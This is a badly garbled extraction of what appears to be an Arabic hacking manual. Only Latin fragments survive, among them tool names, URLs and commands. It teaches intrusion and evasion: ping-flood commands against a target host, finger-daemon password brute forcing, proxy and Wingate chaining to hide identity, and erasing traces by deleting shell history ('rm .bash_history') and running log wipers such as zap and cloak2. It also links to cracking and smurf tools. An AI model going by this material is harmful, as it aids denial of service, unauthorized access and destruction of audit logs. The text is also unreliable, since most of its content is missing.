Professional Documents
Culture Documents
.1
.
.2
.
.3
.
.4
)
.5
(.
)
.6
(.
.
.7
.
.8
.9
.
.10 .
.11 Webcrack.
.12 MungaBunga.
.13 .WinSmurf
.14 Evil Ping .
.15 .
.16 .
.17.
.18 .DNS
1
.24
.
.25 .IIS
.26 UniCode.
.27
.
.28 .
.29 .
.30 God Will
.
.31.
.NOOP4
.32
.
.33 .
.34 .
.35
.
.36
.
>) .37&<( .
.38 CgiScaner .
3
.39
.
.40 Shadow Scan Security
.
.41
.
.42 ) (.
.43 ) (.
.44 ) (.
.45 )(.
.46 .htaccess
.47 FTP.
.48 FTP.
.49 .SQL
.50 SQL.
.51 .
.52 .
.53
.
.54
.
.55 ) PHP Shell (.
4
.75
.76
.77
.
.
.
...
.
"
"
8
" "
.
)) ((
..............................................................
.....
10
...
..........................
.. ..
!!!
((
..
..
11
..
. .
" "
> . <
> : <
.
12
. .
.
13
ISDN 256
.
. - - (:
14
: .
)) )) -
)) ))
.....
.
15
- - -
))
))
))
((
16
Cross Site Scripte
CSS XSS
XSS
XSS
) ( +
:
XSS+BUG+EXPLOIT
: IIS
IIS+exploit+bug
17
:
:
: http://www.google.com/
:
http://www.yahoo.com/ http://www.altavista.com/ http://www.lycos.com/http://hotbot.lycos.com/
18
)) :
.))
kazaa - WinMX
:
http://news.bbc.co.uk/hi/arabic/new
s - http://arabic.cnn.com/ http://www.aljazeera.net/
:
http://www.securiteam.com/ http://www.securityfocus.com/ http://www.ussrback.com/ http://www.ntbugtraq.com/ http://www.ntsecurity.nu/ http://www.ntsecurity.com/
: http://nvidia.com/ http://www.asus.com/ http://drivers.on-line.net.nz/ http://intel.com/ 19
http://www.amdmb.com/
"
"))
20
> <
> :. <
.
.
. ""
.
.
.
..
.
21
:
.
IP
.
.
.IP
.
22
.
.
Start run
.winipcfg .
"" ""
.winipcfg
. IP
IP
212.33.40.1 24.5.66.3
. IP
212
. IP
" "
. IP
IP
.
IANA(Internet Assigned
(Numbers Authority . IP
.
23
:
-1 ARIN (American Registry for
(Internet Numbers
-2 RIPE (Rseaux IP
(Europens
-3 APNIC (Asia Pasific Network
(Information Center
. . IP
.
IP
whois . IP
IP IP
http://www.ripe.net/db/whois.html
IP
.
24
IP
IP .
10.10.10.1 .
0 ) 255
(
.
IP
. IP
.
. IP
212.26.75.34 IP
212.26.75.201
.
IP )
IP (
IP. whois .
http://www.ripe.net/db/whois.html
212.26.75
25
search
.
Port
.
.
.
web server. ftp server
.
26
80
21
1720
.
. .
.
DNS
.
.
.
.
.DNS .
IP ..
CNN
207.145.53.10 www.cnn.com
..
27
. DNS
.
. IP .
DNS
) IP (
www.cnn.com
. .
DNS .
.
... .
DNS
. IP
.
netstat
IP
.
. .
28
. .
.connection
.
Client
.server
.
) .
( )
(port )
(
netstat . ms-dos
prompt programs
.
)IRC) Internet Relay Chat
.
chat server chat
client
.
. .
29
.
.
.
IP
. .
IRC.
chat server
.
.
.
.
IP
)
111.222.
XXX.333
(
30
IP
. .
.
. IP
, :
.1
)
( IP
.
.2 .
: .
.
IP
.
)
( IP
.
31
.
)
(
www.networksolutions.com/cgi /bin/whois/whois.
) www ( wagait.com
.
.
. .
.
32
FTP 21
25
31337
BackOrifice
1720,1503
Netmeeting
33
SMTP
80
Web
110
POP3
6667
Chat
12345,2003
4
NetBus
139
34
35
"
) ("
.
.
.
)( .
.
36
.
-1 ):(Viruses
. .
)
(
.
-2 ):(Trojans
. .
.
) ( . .
.
. .
37
38
.
-3 :
. .
.
.
. "
"
39
)
(
.
.
. ""
) (
.
.
!! .
!!
!!
40
.
-4 :
. .
)
( encrypted
. )
( PWL
41
.
. . 98
. 95
.
. .
-5
!
.
! ICQ
.
.
.
.
IP . .
42
. .
!
-6 -6 :
.
.
. .
) (script.
. .
!
4
.
.
43
-7 :
.
.
.
. . FTP.
) (SMTP .
.
.
. . .
.
.
44
.
. .
.
.
45
" "
> <
><JawaDal :
><z3r0 :
here we G0
..
dos .shell account
.. it reboots . ! .
!!!
. FTP:
/ftp://hostname
GFI LANguard network
security scanner
..21
..
.. !!
46
log in ftp :
...cd lcd dir ls
log in
LOGS...(LOG.FILES) 1
LOG
log files
) (loged in
:
online
IP Address >>>>>>>
) host name (
.
screen resolution
)>>>>(ISP
47
3 log files:
- WTMP \
\ host tty
- UTMP Onlne
- LASLOG \
!!
) (log.files )track you
... (down
: . !
.
<--. <----FTP--
!
.
!
.. . .
<--. <--.
<--...--so on--
!!
48
..
. -: Wingate ..
Wingate
.. Wingate
IP !!
1..
!
....
!! ..
anonymous ..web
!!...... .spyware.
firewall . zone alarm
)
.. (
. !!
windows washer
,. ..
.
. how to Stay
49
: log modifier
ah-1_0b.tar clear.c cloak2.c
invisible.c marryv11.c wzap.c
wtmped.c zap.c
=============================
=====================
=============================
=============
.
anonymous
.
. ..
!!!.
.
51
" "
> <
>:<
.
.
.
------------------------------------------------------ -1
.
-2 .
-3 .
-4 .ACL
-5 .
52
:
-1.
-3.
-3 .
-4.
.
.
:
-1
.
53
-2
.
-3
.
-4
National
.(Security Agency (NSA
-5
.
ROM Boot Chip
. RAM
.
-6.
.
-7 Permissions
54
.
-8 Rights
..
:
-1 .
-2 .
.
.
. . . .
55
.
.
. .
. .
.
.
..
56
Security
(Accounts Manager (SAM
Workstation
Domain
SAM
.
. .
. .
Access Token . .
:
-1 (Security Identifier (SID
.
-2 Group SIDs
..
57
-3 Privileges
.
Access Token
Remote
.Logon
.
. .
:
-1 .
-2 .
-3
58
.
-4 . .No Access
.
.
(Access Control List (ACL
ACL Access
.(Control Entry (ACE
ACE .
SID.
ACE
ACL ACE
SID
.
: ACE
59
-1 .AccessAllowed
-2 AccessDenied
.No Access
.
SID SIDs ACE
ACL.
NT 2000 ACE
AccessDenied ACEs
AccessAllowed ACEs SID
AccessDenied ACEs
AccessAllowed ACEs
SID
.
:
60
:
.
.
:
-1 .
-2 .
61
"
"
><
><BeReal :
.
62
. .
=============================
=============================
===========
) -:(Telnet
.
.
.
.
.
63
)(21
Anonymous Mode
.
. Start ==> Run
==> telnet .
-----------------------------------------------------------------------
-:Scanner
)(Exploits
. .
64
Shadow Security
Scanner Stealth Omran Fast
Scanner .
.
.
IIS
CGI .
----------------------------------------------------------------------
) -:(Exploits
.
URL.
.
.
.
65
. Buffer Over Flow Exploits
CGI
Exploits CGI Bugs
Unicodes Exploits Buffer
Over Flow Exploits
PHP Exploits DOS
Exploits .
.
. Fire Wall
). (c.
.
66
.
.
. )
(
Borland C++ Compiler
. .
---------------------------------------------------------------------
-:FireWall
. .
) (
. .
67
---------------------------------------------------------------------
-:Token )
(Shadowed Passwd
* x . Shadowed
. Shadow file
. etc/shadow/
---------------------------------------------------------------------
-:Anonymouse
.
68
.
---------------------------------------------------------------------
-:Valnerableties
.
Valnerable (:
.
Security Focus .
69
---------------------------------------------------------------------
: passwd file
.
.
-------------------------------------------------------------------- : root .
.
.
.
.
70
-------------------------------------------------------------------- :Server
24
24 . (:
.
71
- .
. -
--------------------------------------------------------------------- ) : ( Buffer over Flow
.
.
-
-
.
- DOS -
.
.
72
" "
:::
.
.
.
.
.
.
73
74
75
76
77
78
http://www.dunbell.freeserve.
co.uk/webcrack40.zip
79
1
2 BROWSE
.
3 BROWSE
81
)
.....(
4
5 )
(
6
7
8
9
. 10
82
11
6
. 12
13
) (
14
:
http://koti.mbnet.fi/hypnosis/c
aliberx/cracking.htm
83
-------------------------------------------------------------
http://www.planeteagle.de/files/WSmurf.zip
86
200
.
.
87
" "
> <
, ,
:
.
.
.
.
88
. :
. .
.
.
:
89
, :
90
:
:
..
http://www.geocities.com/boo
m_q8y4/dorrah.zip
91
" "
> : <
.
...
::
"" ===<==
:
92
Ping www.xx.com
:Xxx
.
:
) ( ) ( ) I-(
ping -n
:
ping -n 1000 -l 400 www.xxx.com
::
...
:
ping -t ip
ip .
93
" "
> <
.
2000
63
94
Telnet Authentication
You can use your local Windows
2000 user name and password or
domain account information to
access the Telnet server. The
security scheme is integrated into
Windows 2000 security. If you do
not use the NT LAN Manager
(NTLM) authentication option, the
user name and password are sent
to the Telnet server as plain text.s
2000 security context for
authentication and the user is not
prompted for a user
If you are using NTLM
authentication, the client uses the
Windowname and password. The
user name and password are
.encrypted
NTLM .
95
In a Windows 2000 Server default
installation, the Telnet service is set
96
In the Computer Management snapin, Telnet is a service located under
the Services and Applications node.
Select Services from the console
tree, and then select Telnet from the
.list of services in the details pane
You can also start or stop the Telnet
service from a command prompt. To
97
98
Quit this
application
Terminate a
user session
Telnet
Server Admin
99
Display/change
registry
settings
Start the
service
Stop the
service
Invalid
input
Failed to
open the
100
registry key
Failed to
query the
registry
value
You can use Microsoft Telnet Client
to connect to a remote computer
running the Telnet service or other
Telnet server software. Once you
have made this connection, you can
communicate with the Telnet server.
The type of session you conduct
depends on how the Telnet software
is configured. Communication,
games, system administration, and
local logon simulations are some
.typical uses of Telnet
101
,Run ,Start ,Telnet
. telnet .telnet
.
TCP/IP
103
104
,Programs , Start
.Services Administrative Tools
Services
.Telnet
The Telnet Properties
((Local Computer
Manual Startup Type
.Automatic
. Start ,Service status
Local) OK
Computer) Telnet properties
. Services
Hishem2 Hishem1
.Run , Start
105
telnet .OK
help ?
open Hishem2
. o open
Hishem2
Hishem2
106
Hishme2
Hishem1
, Start .Run
tlntadmn .OK
Telnet Server Admin
1
.
NOR IP
2 .
107
.
1 .
1
Hishem1
108
List
.
109
dele
pop
[open [\\RemoteServer] [Port
\\ RemoteServer
.
.
Port
110
.
.
.o
Redmond
44:
o redmond 44
Telnet
[close [\\RemoteServer
\\ RemoteServer
.
.
111
.c
Redmond:
c redmond 44
Telnet
]send [\\RemoteServer] [ao] [ayt
[?] [[esc] [ip] [synch
\\ RemoteServer
.
.
ao
.
112
ayt
"."?Are you there
esc
.
ip
.
synch
.Telnet
Telnet
display
113
display
.Telnet ) Telnet
(Telnet
Telnet
.[+CTRL Telnet
.ENTER
tlntadmn
Telnet
]tlntadmn [\\RemoteServer] [start
[[stop] [pause] [continue
\\ RemoteServer
.
.
start
114
.Telnet
stop
.Telnet
pause
.Telnet
continue
.Telnet
Telnet
. tlntadmn
.
2000 .2000
. tlntadmn
Windows 2000 Telnet
.
Windows XP
Telnet
115
tlntadmn [\\RemoteServer] config
[[maxconn=PositiveInteger
\\ RemoteServer
.
.
maxconn=PositiveInteger
.
10
.
Telnet
tlntadmn [\\RemoteServer] config
[[maxfail=PositiveInteger
116
\\ RemoteServer
.
.
maxfail=PositiveInteger
. .
.100
Telnet
tlntadmn [\\RemoteServer] config
[[timeout=hh:mm:ss
\\ RemoteServer
117
.
.
timeout=hh:mm:ss
.
. ? /
..
> <
>< Dark Devil :
:
.....
C
:
:
:DNS
:
119
=============================
=====================
=========================
?DNS
==============
DNS : Domain Name
. System DNS
53
DNS
53
translates alphabetical hostnames
:
/http://www.burn.com IP
ADRESSES 127.0.0.1
address
resolution
IP
DNS
. address resolution
120
DNS
. ). (IP
address
resolution DNS
HOST FILE
IP
Stanford Research
Institute's Network Information
.(Center (SRI-NIC
) (UPDATE
.
FTP
.SRI-NIC
. .
DNS .
121
DNS decentralized
DNS DNS
DNS
.
DNS
.
.
:THE DNS SERVER
================
DNS SERVER
. UNIX
. BIND )
.(Berkeley Internet Name Domain
DNS SERVER
. UNIX
DNS :
the name server itself (the daemon
122
/http://www.burn.com
DNS )
( IP
/http://www.burn.com
IP
.
daemon program
.
:THE TREE INFORMATION
======================
IP
123
DNS DNS
SERVER
.DNS SERVERS
:
ISP
isp.co.uk
ISP's DNS server's
hostname dns.isp.co.uk
DNS IP
/http://www.burn.com
. dns.isp.co.uk
DNS SERVER
.
dns.isp.co.uk some-
organization.org.uk
124
school.edu.uk, university.ac.uk,
england.gov.uk, airforce.mil.uk
UK
DNS
ROOT
IP
.DOMAIN NAME
When and why does DNS "hang" or
?fail
=============================
=========
DNS .
ISP IP
.
DNS
15 .
address could not be found
HOST IP
125
.
DNS . TIMED OUT
REFRESH RELOAD
.
.
SSL
. .
126
127
.
.
:
Physical Address Determination-1
Selection of inter-network-2
gateways
Symbolic and Numeric Addresses-3
ip .
ip
.
)
inclusion of a local network address
129
Physical
Address :
:Physical Address Determination
=============================
==
ip data
.
physical address .
.
ip physical
, addresses
ip
.
.
ip physical
addresses ARP
Address Resolution Protocol
ip physical
131
, addresses
. ARP cache
. arp -a
. .
:
C:\WINDOWS>arp -a
Interface: 62.135.9.102 on Interface
0x2
Internet Address Physical Address
Type
20-53-52-43-00-00 207.46.226.17
dynamic
20-53-52-43-00-00 213.131.64.2
dynamic
20-53-52-43-00-00 213.131.65.238
dynamic
132
Physical Address
Physical Address Mac
Address
Physical Address
ip
Physical Address
router .
type dynamic
.
static
" "
routers
133
SNMP
134
NetBIOS
NetBIOS
API
139 TCP
.
NT
NetBIOS
TCP/IP Advanced
WINS
.
.
RestrictAnonymous
Administrative TOOLS
Local Security policy Local
poicies security options
135
NetBIOS
Net View
NT/W2000
IP
136
Net .
Nbtscan
. ...
...
Legion
TCP UDP
135 445+ 139
137
NetBIOS
.
SNMP 2000
Public
public
Remove Send
authentication trap
138
regedit
HKEY_LOCAL_MACHINE\system\curr
entControlset\serveces\SNMP\parameters
\ExtensionAgent
LANManagerMIB2Agent
.
139
= 2
TCP/IP
NetBIOS
" "Finger
> . <
><LAMeR :
140
.
Finger 79
>================<
1.1
1.2 Finger
1.3. Finger
1.4 . Finger
1.5. . Finger
1.6
1.7.
1.1:
>=========<
141
.
.
1.2 Finger
>===================<
Finger
79
businesscard
.
. ) ( remote user
Finger .
) Finger (79 .
.
..
,
.) (admin
. .
142
.
.
Finger
.
.. Finger.
.
Finger
) Finger Deamon
( " " !Finger me " ! "
Finger
)(bisinesscard
.
Finger Deamon
143
) ( . .
. .
.
portscans . . .
.
Finger
Finger
: Finger
.
.
. . .
:.) ( server
144
.
1.3. Finger
>=================<
. )
( superscan
)
( /http://www.foobar.com
) Port( 79
/http://www.foobar.com
Finger .
. ) (request .
)(client
Finger ) ( installed
. Telnet. Finger
--->Telnet(client) --------request-------
Finger Deamon(in Server) o
145
)MS
: ( DOS
telnet http://www.foobar.com/ 79
telnet
.
.
)(client Finger
Deamon
. .
:::
.
. . "@"
" "www
:
146
finger@anyname.com
:
/finger http://www.anyname.com
www finger
)
: ( unix shell .
finger@foobar.com
. )
(
/http://www.foobar.com
:
Login: Name: Tty: Idle: When:
:Where
root foobar sys console 17d Tue
10:13 node0ls3.foobar.com
<.......> <.......> <.......> Amos Amanda
147
Anderson Kenneth
Bright Adrian
Doe John
<.......> <.......> <.......> Johnson Peter
Mitnick Kevin
Munson Greg
Orwell Dennis
) ( login
)" (Name "
.
)(Tty the
terminal type
) (Idle .the idle time
.
..
.
148
.. .
.
) Johnson Peter
( :
finger johnson@foobar.com
1.4 . Finger
> =========================
===========<
.Finger
Finger deamon
..
) ( % 50
/
)(Access ..
149
bruteforce
worldist
password cracker
/http://www.thehackerschoice.com
VLAD's pwscan.pl
) word (
. - bruteforce
-
.
.
) (Admin )(root
150
.
.
.
:
finger secret@foobar.com
Finger Deamon
" "secret
.
" "test " "temp ""0000
" "secret
.
finger .@foobar.com
finger 0@foobar.com
151
!
Finger Deamon
RFC !
1.5. . Finger
> =========================
=============<
. ) Finger Finger
"" ""(
. "
"www.victim.com
""www.host.com
. Finger
. ):
(
finger@host.com@victim.com
Host.com ) (Finger
152
victim.com .
victim.com
. /http://www.victim.com
) (log
/http://www.host.com
.
) Host(
. ) ( Finger.
. . Finger
. . Finger
.
: .
.
!.
153
1.6
>=======================<
Finger Deamon
) ( access ..
Finger deamon
.access
wordlist .bruteforce
". "
.Finger deamon
154
"
" NET
> <
.
.net
net
155
:
net
? net /
.
net
net help command
.
net acc
ounts :
net help accounts
net
) /y( ) /n( .
net stop serv
er
net stop
server /y
.
.
).("Service Name "
156
:net logon
"net start "net logon
Net
Net accounts
.
net accounts
| [/forcelogoff:{minutes
]no}] [/minpwlen:length
| [/maxpwage:{days
]}unlimited
][/minpwage:days
][/uniquepw:number
][/domain
}/forcelogoff:{minutes | no
157
.
.
.
no
.
/minpwlen:length
..
0 127
.
| /maxpwage:{days
}unlimited
.
. .
unlimited
.
/maxp
wage /minpwag
.e 1
49,710 )
158
unlimited 49,710
( 90
.
/minpwage:days
.
.
.
0
.
0 49,710
.
/uniquepw:number
.
number
.
0 24
.
/domain
159
.
,
.
net help command
net
.
Net
Logon
. .
net
accounts
.
. :net accounts
o .
.
net user
.
o Net Logon
160
. Net
Logon
.
. /forcelogoff:
minutes
. .
.
minutes
.
:
net accounts
:
161
Net computer
.
net
\ computer
| \ComputerName {/add
}/del
\\ComputerName
.
}{/add | /del
.
net help command
net
.
Net computer
163
Grizzlybear
:
net computer \\grizzlybear
/add
Net config
.
net
config
.
|net config [{server
]}workstation
server
164
.
workstation
.
?/
.
(
) Server is active on
(
) Server hidden /hi
(dden
Maximum logged on
) users
.
(
Maximum open files per
) session
(
) Idle session time(
. net config
workstation
.
Net config
workstation :
Computer name
Full computer name
User name
166
)Workstation active on
(
)Software version
(
Workstation domain
Workstation domain DNS
name
Logon domain
( )COM open timeout
( )COM send count
)COM send timeout
(
Net continue
.net pause
net continue service
service
.
167
.
.service
Net
netlogon
.Logon
NT
"nt lm
LM Security security
Support
support
.Provider "provider
schedule
..
server
.
workstatio
.
n
net help command
net
.
.
168
. net continue
..
.
.
) "
.("Service Name
:
net continue workstation
.
NT LM
Security Support Provider
Service:
net continue "nt lm
security support
169
"provider
Net file
.
. .
net file
.
]]net file [ID [/close
ID
.
/close
.
.
170
net files
.
. net file
. .
.
.. net file /close
.
net file :
File
Path
Username #locks
-----------------------------------------0
C:\A_FILE.TXT
MARYSL
0
171
C:\DATABASE
DEBBIET 2
:
net file
1
:
net file 1 /close
Net group
.
net group [groupname
[/comment:"text"]]
[/domain]
net group [groupname
{/add [/comment:"text"]
| /delete} [/domain]]
172
groupname
.
.
"/comment:"text
.
48 .
.
/domain
.,
.
/add
173
. .
.
.
/delete
. .
]UserName[ ...
.
.
net help command
net
.
net group
.
. .net groups
174
net group
.
. .
net group
)*(.
net group
:
Group Accounts for
\\PRODUCTION
--------------------------------------------*Domain Admins
*Domain Users
:
net group
nor
175
:
net group NOR /add
nor
:
net group NOR /add
/domain
stevev ralphr jennyt
nor
:
net group NOR stevev
ralphr jennyt /add
stevev ralphr jennyt
nor
:
net group NOR stevev
ralphr jennyt /add /domain
nor:
net group NOR
176
Net help
.
. net
help
.
]net help [command
command
/help
.
.
net
177
use:
net help use
:
net use /help
net help
:
?net help /
Net helpmsg
.
net helpmsg message#
message#
.
.
net help command
net
.
178
:
2182: The requested service has already been
started.
. NET
2182:
net helpmsg 2182
Net localgroup
. .
net
localgroup
.
net localgroup
[GroupName
]]"[/comment:"text
179
180
.
remotely connection
.
.
)rlogin,rsh
.(and rcp
. secure shell
tcp .
:: ::
. secure shell
r- commands
=============================
=====================
=============================
=========
182
======================
* BSD
r- commands )
(rlogin,rsh and rcp
) (root access
unauthorized
access to systems
:
.
(
183
ssh
. authorized access to systems
secure
shell
184
) . (
::
. ssh
=============================
==============
-1 ip spoofing
ssh
ssh
. localy
-2 DNS spoofing
-3
-4
185
ssh
ssh
disconnected
.
.
ssh )
three-key triple-DES, DES, RC4-128,
(TSS, Blowfish .
.
" encryption of type
"none !
ssh
,
ip spoofing DNS
spoofing
.
186
. .
.
:
-1 Buffer Overflow
<--------------------------
-2)(Proccess
<-----------------
-3 )(Memory management
<--------------------------------
-4 Buffer Overflow
<----------------------------------
*
.
188
-1 Buffer Overflow
<>-----------------------
Buffer Overflow
.
Buffer
Overflow ' 'code red
. IIS MS web-
- server
Buffer Overflow
)
20(
.
:
" :
" : .
) (
.
15
) .( 25
189
) .
(.
15
" "Overflow
.
:
>var1><var2><vname><Other
<things in memory
10b 6b 15b
) var 1 var 2
vname, 15
.(
. "
abcabcabcabcabcabcabcabca
"bc :
somevalue2avalusabcabcabc
abcabcabcabcabcabc
>var1 ><var2><vname ><other
<things go here
190
" vname
"overflowed
. "other things in
memory "
) (overflow ..
.
. linux
. .
-2):(Proccess
<>----------------
).(Proccess
.
191
.
" Multi-
"proccesses ...
) (CPU
.
.. (:
.
:
-3 ):(Memory management
<>------------------------------
-operating systems-
virtual
)memory(.
) (
.
192
Operating System
"
)(" .
. ) OS. (
.
. ) (
.
) ( .
.
)
(
.
.:
)
(
)
(
193
) (
)( .
-4 Buffer Overflow
<>---------------------------------
) (Root
.
)( .
) (overflow
.
: )(
. )
(
194
)(
. . ..
Buffer Overflows
Buffer Overflows
.
Buffer Overflow
.
195
) (1 CGI
196
CGI=COMMON GATEWAY
INTERFACE
.
)
(HTTP
TCP/IP
.
) 80
(
.
.
197
.
:
-1 .
-2
.
198
GET -1 .
POST -2
PUT -3
) (2
199
HTTP
.
.
. FTP .TELNET
"
!"
200
> <
> :<
:
==========
..
.
..
..
.. .
.. ..
..
log
.. files . !
!!
..
201
************************
)
( exploites
"
"
) ( 0day
..
!!
!!
. !!
..
hacker
..
************************
8 :
202
=================
: )
(
: **"
" Paranoid
:
" " Paraniod " " Paranoid !
** ..
.
:
. )
(
LoGs203
:
) (
lOGs ..
syslog configuration andlogfile
Admins checksum checkingsoftware
. :
: .
. .
:
: ........
204
!!! ...
************************
:
=======
:*************
..
..
) ( Hacker
..
) (
.
" " Paranoid***************************
" " Paranoia
)
(
205
..
:
paraniod
!!
.. ..
..
.
!!
.. .
.. ... .. ..
) (
. ..
!!
!
..
)
206
( .. ..
.. !!
..
log
hacker . .. 100
%
" " Paranoid*********************
" " Paranoid
...
) (
...
..
207
..
..
)
(
..
.
!
!
******************************************
..
:
!!!!
208
:=========
******
..
:***********
SysAdmin
.
..
209
(= hacker
.. ..
) (
>--
<-
sensitive data
.
..
:
MsDos SFS v.17SecureDrive 1.4b
. *Amiga EnigmaII * ) v1.5 .
(
Unix CFS v1.33210
) (
) ( :
Triple DES IDEA (Blowfish (32 rounds file2file :
PGP v2.6.x Unix
) System (
. :
SSH DES Login .. ..
.. ..
..
211
)
8- 4 ( 8
.
.. )
( ..
!!
CD
HD
..
document files
!!
:
=================
212
: , ,
.
:
!! keyborad
..
!!! !!
!!!
...
"
"
!!!
213
:
===================
\\\ :
. ..
telnet
security ..
!!!!
... ==<
>----
: LoGS
214
============
3 :
WTMP ) log( on/off - log in/logout + tty + host
UTMP ! LASTLOG - logins
** )
(
telnet , ftp ,
rlogin ..
:
!! . .. % 99.9 )
.. (
logfiles
..
215
. ..
.. .
.
:
.
.
ZAP (or ZAP2
.
.
. ..
root log
) files (
) default
(
UTMP : /etc or /var/adm or /usr/adm
or /usr/var/adm or /var/log
WTMP : /etc or /var/adm or /usr/adm
or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or
/usr/adm or /var/adm or /var/log
$home/.lastlog
216
:
=======
!!! ..
tmp and $HOME/
$HOME Shell History
:
: History files
sh : .sh_history
csh : .history
ksh : .sh_history
bash: .bash_history
zsh : .history
: Backup Files
~* ,dead.letter, *.bak
: History files
mv .logout save.1
echo rm -rf .history>.logout
echo rm -rf .logout>>.logout
echo mv save.1 .logout>>.logout
217
======================
. encrypted
partition .
) (
admin .
..
..
.. .
shells
background
!!!
. parametres
...
.
telnet http://www.host.com/ :
23
telnet
218
open
/http://www.host.com
..
backdoors .
) sub7 (
:
=============================
==
*******
sniffer ..
.
:
**********************
) (
hacker
...
219
!!!
...
* ) (
) ( admin .
) (
output sniffer
netstat
online
!! GateWay Server
* A gateway server in between
.
wtmp and lastlogs
. gateway
server
..
220
..
gateway server
..
==< ) root access
(
Dialup server
..
(= hacked system
:
dialup . hacking
server
) ( )
( dialup servers
!
:
221
lOGs ..
********************************************
******
***
.
..
:
- 1 :
. LSOF List Open
Files
- 2 )
( -
touch /tmp/check
222
=(
syslog configuration andlogfile
************************************
syslog function
..
syslog
logs
hosts ...
hosts
syslog /etc/syslog.conf
******************************
.
cron
/var/spool/cron/crontabs
. . Root
.
.
224
"."crontab -l root
. ~/bin
. sinnefer
.
back door
Admins****************************
,
225
.
:
forword. alias sulog su root
group ) admin,
root, wheel, etc
passwd
, .
) .
,. chid.c,
changeid.c .( .
history/.sh_history/.bash_history
,
,
. .
profile/.login/.bash_profile
alias . ,
226
. .
,
- 1.
"tripwire -update
."/bin/target
- 2
)
checksum
(
. *******************
.
) ( ..
admins
startup
229
:
=========
***************************
) (
administrators .
) (
: administrators hacker ==<
...
) admins
hacker
administrator
administrator (
..
230
..
..
. .
..
) (
..
..
..
:
=========
. .
. :
********************************************
******
**************
: !!!! :
231
..
..
) (
.
..
: !!! :
..
..
) (
..
!
.
232
:
========
:
******************************
Change - Changes fields of the
logfile to anything you want
Delete - Deletes, cuts out the entries
you want
Edit - real Editor for the logfile
Overwrite - just Overwrites the
.entries with zero-value bytes
Don't use such software (f.e. zap) !it can be detected
-------------------------------------------------------------LOG MODIFIER
++++++++++
233
**********
..
.. !!
) (
..
235
"
) ( "
> <
> :<
.
/http://hackergurus.tk
proxy server .
proxy server
/http://hackergurus.tk
. server
237
:...
bit
)(
.
.
. proxey server
lucky
. .
!
. .
proxy
server
download #..
238
10.
proxy server.
Refresh
Reload
Why use a Proxy Server
=) (=
. .
.
!!!
:
ISP
Internet Service Provider
.
Traffic
.
proxy server
239
.
ip
ip .
.
.
.
proxy port
proxy server
!! (..
.
cach.microsoft.com 80
-1
-2
240
-3
.
Logs
Introduction to Wingate
=) =(Wingate
WinGate
proxy server firewall
.
) Anonymously
(
.
WinGate
:
-----------------------------------------------------------------------------------------241
DIScover
. !!!
. WinGate
WinGate
SyGate
) Logs(
WinGate Server 48
) ISP's (
. wingate
How do I find Wingates
=) WinGate(=
. wingate
. .
WinGate Scanner
243
google
/http://www.google.com
ip hostname
@home
:
wingates
wingate NetWork
...
Unix :
Trial and Error
wingate 23
. ) Guest(
Anonymously
Introduction to Socks Host
=) =(Socks Host
Socks Host WinGate
244
1080
**********************
**********************
Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$
Stealther
------------------------------------------
-------------------------------------------
%100
245
"
) ( "
> <
> :<
...
Chaining Proxies
Chaining wingates
Telnet
)------------------------------------------ . proxy ip
Domain .
246
.
. Proxy
Ip Address
Domain ,,,
.
Proxy
:
http://www.multiproxy.org/anon_list
.htm
http://tools.rosinstrument.com/prox
/y
Group .
:
P_R_O_X_Y@yahoogroups.com
P_R_O_X_Ysubscriber@yahoogroups.com
247
Replay
)------------------------------------------=========================
. .
:
/http://www.privacy.net
/http://www.proxytester.com
Ip . !!!
..
=========================
*************************************
&&&&&&&&&&&&&&
proxy server
&&&&&&&&&&&&&&
248
. Proxy. ):
(WebSite,IRC Chat,etc
.
.
Proxy Server
...
]User]>>>>>[Proxy]>>>>>[Web
[Pages
---------------Proxy Chaining
---------------
/
249
]
User]>>>[Proxy1]>>>[Proxy2]>>>[Pr
[oxy3]>>>[Proxy4]>>>[Destination
.
Destination = web page, Unix
server, ftp server, etc
Proxy chaining
server telnet, ftp, or http
Chaining
%100
ftp
Adminstrator Logs
proxy
. Chaining Proxy
250
Logs
.
Logs
...
---------------HTTP Chaining
--------------- HTTP chaining Proxy
Address
:
_http://proxy.magusnet.com/-http://www.google.com
) (-_-
!!!
. Chaining:
_http://proxy.server1.com/-_http://proxy.server2.com/-http://www.destination.com
251
http://anon.free.anonymizer.com/htt
p://www.google.com
) (/
http://proxy1/http://proxy2:80/proxy
3:80/http://www.yahoo.com
= proxy
.....
---------------Browser Chaining
--------------- .
Internet Explorer
----
213.234.124.23:80
252
213.234.124.23:
80:
ISP
Tools
Internet Options
Connections
Settings
) Address(
) Port(
213.234.124.23: 80:
.
Chaining Proixes
/
Address: 213.234.124.23:80
253
121.172.148.23:80 143.134.54.67
Port: 80
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$
&&&&&&&&&&&&&&
Wingates
&&&&&&&&&&&&&&
Wingate proxy server
)) 23 Telnet ((
Wingates
online
.
Admin .
wingate
. !!!!
ip
23 Telnet
254
WinScan
Wingate
Download
------------------------------Chaining Wingates Using Telnet
------------------------------ Wingate .
255
DoS Telnet
.....
wingate 23
Telnet
61.133.119.130 23
Telnet:
C:\WINDOWS>telnet 61.133.119.130
23
Wingate> 203.207.173.166 23
256
Wingate> 213.17.99.45 23
Wingate> 10.65.212.7 23
wingate
WinGate>arbornet.org
C:\Windows> telnet 61.133.119.130
23
Wingate>203.207.173.166 23
Wingate>135.245.18.167 23
257
Wingate>m-net.arbornet.org
Connecting to host
arbornet.org...Connected
258
"
"Logs
> . <
> :. <
.
..
Unix Multi-User Mode .
. Operation ) ( Linux
. ) . ( Unix
Unix
:
259
.
.
.
.
....
: .
( LOG File ) ...
: ...
....
IP
260
........
.
.
.
Microsoft
Windows Linux Mac
....
261
..
: .
...
) LOG
. ( File .
262
)(Web servers
) (log files
.
.
) (log file
.
.
.
- -
. :
...
. .
...
263
:
. . WIN NT
...
:
) ( )
(
...
.
. ...
..
...
264
.
. :
lastlogin.
.
.
bash_history.
contactemail.
.
Tmp trash.
. etc
.
lastlogin &.
.bash_history
. rm
bash_history.
265
:
rm .bash_history
rm .bash_history
lastlogin.
.
....
. cpanel .
..
.
localhost :
...
:
....
266
...
...
...
...
: ...
....
.
..
..
) ( HTTP Protocol
.
267
.
HTTP ....
. SOCKS Protocol
. .
. .
.
Web Proxy Service (1 .
. HTTP Protocol
WinSock Proxy Service (2
windows NT
telnet
FTP WinSock
...... Protocol
. Socks Proxy Service (3
)SSL) Secure Sockets
Layers )IIS) Internet
Information Server. Windows
NT FTP Telnet GopherIRC
RealAudio POP3
268
firewall .
... securiy
.....
. TCP/IP.
:
* )Internationa
